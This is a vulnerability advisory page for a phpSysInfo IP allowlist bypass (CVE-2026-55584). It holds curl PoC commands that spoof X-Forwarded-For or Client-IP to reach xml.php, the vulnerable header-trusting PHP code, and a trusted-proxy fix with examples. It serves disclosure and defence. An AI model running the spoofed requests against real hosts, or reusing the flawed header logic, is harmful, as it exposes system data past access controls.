## https://sploitus.com/exploit?id=PACKETSTORM:224403
# CVE-2026-55584 - phpSysInfo IP Allowlist Bypass
CWE-290, CVSS 7.5 (High), phpSysInfo <= 3.4.5
Refs: [GHSA-786w-p5pm-cvgh](https://github.com/phpsysinfo/phpsysinfo/security/advisories/GHSA-786w-p5pm-cvgh), [CVE.org](https://www.cve.org/CVERecord?id=CVE-2026-55584)
`PSI_ALLOWED` resolves the client IP from the attacker-controlled `X-Forwarded-For` (then `Client-IP`) headers before falling back to `REMOTE_ADDR`. There is no trusted-proxy concept, so spoofing an allowed IP defeats the allowlist and exposes full system info via `xml.php`.
PoC:
```bash
# allowlist set to an address the attacker doesn't own (ALLOWED=8.8.8.8)
curl -s http://target/xml.php # "Client IP address (...) not allowed."
curl -s -H "X-Forwarded-For: 8.8.8.8" http://target/xml.php # bypass, full XML
curl -s -H "Client-IP: 8.8.8.8" http://target/xml.php # bypass, full XML
```
Vulnerable code (`read_config.php`):
```php
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
    $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];   // attacker-controlled header, trusted first
} elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
    $ip = $_SERVER["HTTP_CLIENT_IP"];         // also attacker-controlled
} else {
    $ip = $_SERVER["REMOTE_ADDR"];            // only trustworthy source, checked last
}
```
Fixed in 3.4.6 (commit 019fa2d): default to `REMOTE_ADDR`; honor `X-Forwarded-For` / `Client-IP` only when the request arrives from a configured trusted proxy.
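The trusted-proxy approach the fix describes, as an added example (not phpSysInfo's own 3.4.6 code): `REMOTE_ADDR` is the default, and proxy headers are consulted only when the TCP peer is a configured proxy. `resolveClientIp`, `isAllowed` and the `$trustedProxies` list are illustrative names, and the request arrays are constructed to mirror the PoC.

```php
<?php
// Resolve the client IP for an allowlist check. REMOTE_ADDR comes from the
// socket and cannot be set by a request header, so it is the default answer;
// X-Forwarded-For / Client-IP are honoured only if the peer is a trusted proxy.
function resolveClientIp(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;   // direct client (or unknown proxy): headers are ignored
    }
    if (isset($server['HTTP_X_FORWARDED_FOR'])) {
        // Walk the chain from the right, skipping other trusted proxies, so the
        // hop our proxy actually saw wins rather than a value the client prepended.
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        for ($i = count($hops) - 1; $i >= 0; $i--) {
            if (filter_var($hops[$i], FILTER_VALIDATE_IP) === false) {
                break;    // malformed entry: fall back to the proxy address
            }
            if (!in_array($hops[$i], $trustedProxies, true)) {
                return $hops[$i];
            }
        }
    } elseif (isset($server['HTTP_CLIENT_IP'])
        && filter_var($server['HTTP_CLIENT_IP'], FILTER_VALIDATE_IP) !== false) {
        return $server['HTTP_CLIENT_IP'];
    }
    return $remote;
}

function isAllowed(string $ip, array $allowed): bool
{
    return in_array($ip, $allowed, true);
}

// Constructed request mirroring the PoC: allowlist is 8.8.8.8, no trusted proxy,
// and the client sends a spoofed header. The header is ignored, the real peer
// 203.0.113.7 is not allowlisted, so the request is refused.
$allowed = ['8.8.8.8'];
$spoofed = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => '8.8.8.8'];
var_dump(isAllowed(resolveClientIp($spoofed, []), $allowed));

// Same header arriving through a configured proxy at 10.0.0.2 that appended the
// real client address: only the rightmost untrusted hop (198.51.100.9) is used,
// and the client-supplied 8.8.8.8 at the front of the chain is never reached.
$viaProxy = ['REMOTE_ADDR' => '10.0.0.2',
             'HTTP_X_FORWARDED_FOR' => '8.8.8.8, 198.51.100.9'];
var_dump(resolveClientIp($viaProxy, ['10.0.0.2']));
```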
Reported by Muhammed Mirac Kayıkci